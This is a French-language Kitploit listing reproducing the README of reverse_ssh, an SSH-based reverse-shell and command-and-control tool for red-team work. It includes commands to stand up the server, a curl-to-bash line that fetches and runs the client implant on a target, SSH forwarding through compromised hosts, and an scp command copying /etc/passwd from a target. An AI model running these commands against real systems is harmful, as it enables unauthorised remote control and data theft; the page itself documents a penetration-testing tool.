Skip to content
KitploitKITPLOIT
OutilsExploitsBlog
Log in
Soumettre
OutilsExploitsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
reverse_ssh — Outil de gestion de shell inversé basé sur SSH avec prise en charge native de SCP/SFTP, multiples protocoles de transport, génération de DLL Windows et exécution sans fichier pour les opérations d'équipe rouge. | Kitploit
Outils/GitHubGitHub/nhas/reverse_ssh
ShellcodeGénération de Shellcode
GitHubnhas/reverse_ssh

reverse_ssh

Outil de gestion de shell inversé basé sur SSH avec prise en charge native de SCP/SFTP, multiples protocoles de transport, génération de DLL Windows et exécution sans fichier pour les opérations d'équipe rouge.

Voir le dépôt
1.4k18434il y a 22 joursVérifié par Kitploit

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

Reverse SSH

icon
(Crédit artistique : https://www.instagram.com/smart.hedgehog.art/)

Vous voulez utiliser SSH pour les shells inversés ? Maintenant c'est possible.

  • Gérez et connectez-vous aux shells inversés avec la syntaxe SSH native
  • Redirection dynamique, locale et distante
  • Implémentations natives SCP et SFTP pour récupérer des fichiers depuis vos cibles
  • Shell Windows complet
  • Transports réseau multiples, comme http, websockets, tls et plus
  • Authentification mutuelle client et serveur pour créer des canaux de contrôle de haute confiance Et plus encore !```text +----------------+ +---------+ | | | | | | +---------+ RSSH | | Reverse | | | Client | | SSH server | | | | | | | +---------+ +---------+ | | | | | | | | | Human | SSH | | SSH | +---------+ | Client +-------->+ <-----------------+ | | | | | | | RSSH | +---------+ | | | | Client | | | | | | | | | +---------+ | | | | | | +----------------+ | +---------+ | | | | | RSSH | +---------+ Client | | | +---------+
https://github.com/user-attachments/assets/11dc8d14-59f1-4bdd-9503-b70f8a0d2db1

- [SSH inversé](#reverse-ssh)
  - [TL;DR](#tldr)
    - [Configuration](#setup)
    - [Utilisation de base](#basic-usage)
  - [Sponsors](#sponsors)
    - [Particuliers](#individuals)
    - [Entreprises](#companies)
  - [Fonctionnalités avancées](#fancy-features)
    - [Privilèges](#privileges)
    - [Reconnexion automatique](#automatic-connect-back)
    - [Téléchargement de shell inversé (génération de client et serveur HTTP intégré)](#reverse-shell-download-client-generation-and-in-built-http-server)
    - [Transports alternatifs (HTTP/Websockets/TLS)](#alternate-transports-httpwebsocketstls)
    - [Autocomplétion Bash](#bash-autocomplete)
    - [Génération de DLL Windows](#windows-dll-generation)
    - [Sous-systèmes SSH](#ssh-subsystems)
      - [Tous](#all)
      - [Linux](#linux)
      - [Windows](#windows)
    - [Intégration de service Windows](#windows-service-integration)
    - [Prise en charge complète du shell Windows](#full-windows-shell-support)
    - [Webhooks](#webhooks)
    - [Tun (VPN)](#tun-vpn)
    - [Exécution sans fichier (les clients prennent en charge le téléchargement dynamique d'exécutables à exécuter en tant que shell)](#fileless-execution-clients-support-dynamically-downloading-executables-to-execute-as-shell)
      - [Schémas URI pris en charge](#supported-uri-schemes)
- [Aide](#help)
  - [Windows](#windows-help)
    - [SFTP](#windows-and-sftp)
    - [Erreurs de création de session (0xc0000142)](#session-spawn-errors-0xc0000142)
  - [Le serveur démarré avec `--insecure` a toujours `Failed to handshake`](#server-started-with---insecure-still-has-failed-to-handshake)
  - [Avant-plan vs Arrière-plan](#foreground-vs-background)
- [Dons, soutien ou contribution](#donations-support-or-giving-back)

## TL;DR

### Configuration

La version Docker est recommandée car elle inclut la bonne version de Golang et un compilateur croisé pour Windows.```sh
# Start the server
docker run -p3232:2222 -e EXTERNAL_ADDRESS=<your.rssh.server.internal>:3232 -e SEED_AUTHORIZED_KEYS="$(cat ~/.ssh/id_ed25519.pub)" -v ./data:/data reversessh/reverse_ssh

ou docker compose:```yaml services: reversessh: image: reversessh/reverse_ssh ports: - "3232:2222" environment: - EXTERNAL_ADDRESS=<your.rssh.server.internal>:3232 - RSSH_CONSOLE_LABEL=c2.label - RSSH_LOG_LEVEL=INFO # DISABLED, INFO, WARNING, ERROR, FATAL - SEED_AUTHORIZED_KEYS=${SSH_PUBLIC_KEY} volumes: - ./data:/data

### Utilisation de base```sh
# Connect to the server console
ssh your.rssh.server.internal -p 3232


# List all server console commands
catcher$ help

# Build a new client and host it on the in-built webserver
catcher$ link
http://192.168.0.11:3232/4bb55de4d50cc724afbf89cf46f17d25


# curl or wget this binary to a target system then execute it,
curl http://192.168.0.11:3232/4bb55de4d50cc724afbf89cf46f17d25.sh |  bash

# then we can then list what clients are connected
catcher$ ls
                                 Targets
+------------------------------------------+-----------------------------------+
| IDs                                      | Version                           |
+------------------------------------------+-----------------------------------+
| a0baa1631fe7cfbbfae34eb7a66d46c00d2a161e | SSH-v2.2.3-1-gdf5a3f8-linux_amd64 |
| fe6c52029e37185e4c7d512edd67a6c7694e2995 |                                   |
| dummy.machine                            |                                   |
| 192.168.0.11:34542                       |                                   |
+------------------------------------------+-----------------------------------+

Toutes les commandes supportent le drapeau -h pour afficher l'aide.

Ensuite, les commandes ssh typiques fonctionnent, spécifiez simplement votre serveur rssh comme hôte de rebond.```sh

Connect to full shell

ssh -J your.rssh.server.internal:3232 dummy.machine

Start remote forward

ssh -R 1234:localhost:1234 -J your.rssh.server.internal:3232 dummy.machine

Start dynamic forward

ssh -D 9050 -J your.rssh.server.internal:3232 dummy.machine

SCP

scp -J your.rssh.server.internal:3232 dummy.machine:/etc/passwd .

## Sponsors 

Un immense merci aux personnes suivantes pour leurs dons au projet RSSH et qui rendent tout cela possible ! 

### Particuliers
[chikamobina](https://github.com/chikamobina) pour leurs généreux dons !  
[wrighterase (ctrlzero)](https://github.com/wrighterase) pour leurs pull requests et leur don ! 

### Entreprises

[Carapace](https://carapace.nz/) est une société de conseil en sécurité basée en Nouvelle-Zélande avec une équipe extrêmement talentueuse !  
[<img src="https://assets.kitploit.com/production/public/readmes/5627/b077b138b5108d69a3bcb10eea9d5f195914c9fb4653689923b3a10a1ee38a64.png">](https://carapace.nz/)


## Fonctionnalités avancées


### Privilèges
Le serveur RSSH prend en charge des privilèges utilisateur très basiques. Les utilisateurs présents dans le dossier `data-directory`/`keys` (spécifié par `--datadir`) par exemple `data-directory/keys/jim` seront assignés en tant qu'"utilisateur" capable uniquement de voir les clients qui sont publics (trouvés dans le fichier authorized_controllee_keys sans balise `owners`, ou avec une balise `owners` vide) ou spécifiquement assignés à eux, par exemple `owners="jim"`.
Télécharger l’outil